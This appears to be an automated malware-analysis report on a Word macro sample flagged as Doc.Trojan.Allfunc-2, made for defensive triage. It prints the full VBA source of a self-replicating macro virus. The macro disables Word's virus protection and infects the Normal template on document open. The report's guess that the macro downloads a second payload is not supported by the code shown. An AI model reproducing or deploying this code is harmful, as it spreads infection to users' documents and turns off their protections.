Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The heuristic firings and ClamAV detection strongly indicate malicious intent, likely to download and execute a secondary payload. The VBA code appears to be designed to inject itself into the document or Normal.dot template.
Heuristics (3)
- ClamAV: Doc.Trojan.Allfunc-2 (severity: critical, rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Allfunc-2
- VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding). Document contains VBA macro code
- Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN). Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4936 bytes | 7c7963a09e5606c4f5c5c173f211327d6cf7ef9cd24d9805cd0eca9b83f2ed29 | ClamAV: Doc.Trojan.Allfunc-2; obfuscation or payload: unlikely |
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): IT
End Sub
Private Function IT()
Options.ConfirmConversions = 0
Options.SaveNormalPrompt = 0
Options.VirusProtection = 0
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument Else Set Target = NormalTemplate
Set TargetModule = Target.VBProject.VBComponents.Item(1).CodeModule
If TargetModule.CountOfLines = 0 Then TargetModule.AddFromString "Private Sub Document_Open()" & vbCrLf & "End Sub"
For X = 1 To TargetModule.CountOfLines
If TargetModule.Lines(X, 1) = "Private Function IT()" Then GoTo Quit
Next
Set Host = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
For X = 1 To Host.CountOfLines
If Host.Lines(X, 1) = "Private Function IT()" Then GoTo Continue
Next
Continue:
TD = Host.Lines(X, 24)
For X = 1 To TargetModule.CountOfLines
If Left(TargetModule.Lines(X, 1), 4) = "Sub " Then TargetModule.ReplaceLine X, TargetModule.Lines(X, 1) & ": IT"
If Left(TargetModule.Lines(X, 1), 12) = "Private Sub " Then TargetModule.ReplaceLine X, TargetModule.Lines(X, 1) & ": IT"
Next
TargetModule.AddFromString TD
If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Quit:
End Function
' Processing file: /opt/analyzer/scan_staging/ab37d7ebb44f4ec0a717b738e7791cd1.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3227 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' BoS 0x0000
' ArgsCall IT 0x0000
' Line #1:
' EndSub
' Line #2:
' FuncDefn (Private Function IT(id_FFFE As Variant))
' Line #3:
' LitDI2 0x0000
' Ld Options
' MemSt ConfirmConversions
' Line #4:
' LitDI2 0x0000
' Ld Options
' MemSt SaveNormalPrompt
' Line #5:
' LitDI2 0x0000
' Ld Options
' MemSt VirusProtection
' Line #6:
' Ld ThisDocument
' Ld NormalTemplate
' Eq
' If
' BoSImplicit
' SetStmt
' Ld ActiveDocument
' Set Target
' Else
' BoSImplicit
' SetStmt
' Ld NormalTemplate
' Set Target
' EndIf
' Line #7:
' SetStmt
' LitDI2 0x0001
' Ld Target
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' Set TargetModule
' Line #8:
' Ld TargetModule
' MemLd CountOfLines
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' LitStr 0x001B "Private Sub Document_Open()"
' Ld vbCrLf
' Concat
' LitStr 0x0007 "End Sub"
' Concat
' Ld TargetModule
' ArgsMemCall AddFromString 0x0001
' EndIf
' Line #9:
' StartForVariable
' Ld X
' EndForVariable
' LitDI2 0x0001
' Ld TargetModule
' MemLd CountOfLines
' For
' Line #10:
' Ld X
' LitDI2 0x0001
' Ld TargetModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0015 "Private Function IT()"
' Eq
' If
' BoSImplicit
' GoTo Quit
' EndIf
' Line #11:
' StartForVariable
' Next
' Line #12:
' SetStmt
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' Set Host
' Line #13:
' StartForVariable
' Ld X
' EndForVariable
' LitDI2 0x0001
' Ld Host
' MemLd CountOfLines
' For
' Line #14:
' Ld X
' LitDI2 0x0001
' Ld Host
' ArgsMemLd Lines 0x0002
' LitStr 0x0015 "Private Function IT()"
' Eq
' If
' BoSImplicit
' GoTo Continue
' EndIf
' Line #15:
' StartForVariable
' Next
' Line #16:
' Label Continue
' Line #17:
' Ld X
' LitDI2 0x0018
' Ld Host
' ArgsMemLd Lines 0x0002
' St TD
' Line #18:
' StartForVariable
' Ld X
' EndForVariable
' LitDI2 0x0001
' Ld TargetModule
' MemLd CountOfLines
' For
' Line #19:
' Ld X
' LitDI2 0x0001
' Ld TargetModule
' ArgsMemLd Lines 0x0002
' LitDI2 0x0004
' ArgsLd LBound 0x0002
' LitStr 0x0004 "Sub "
' Eq
' If
' BoSImplicit
' Ld X
' Ld X
' LitDI2 0x0001
' Ld TargetModule
' ArgsMemLd Lines 0x0002
' LitStr 0x ... (truncated)
```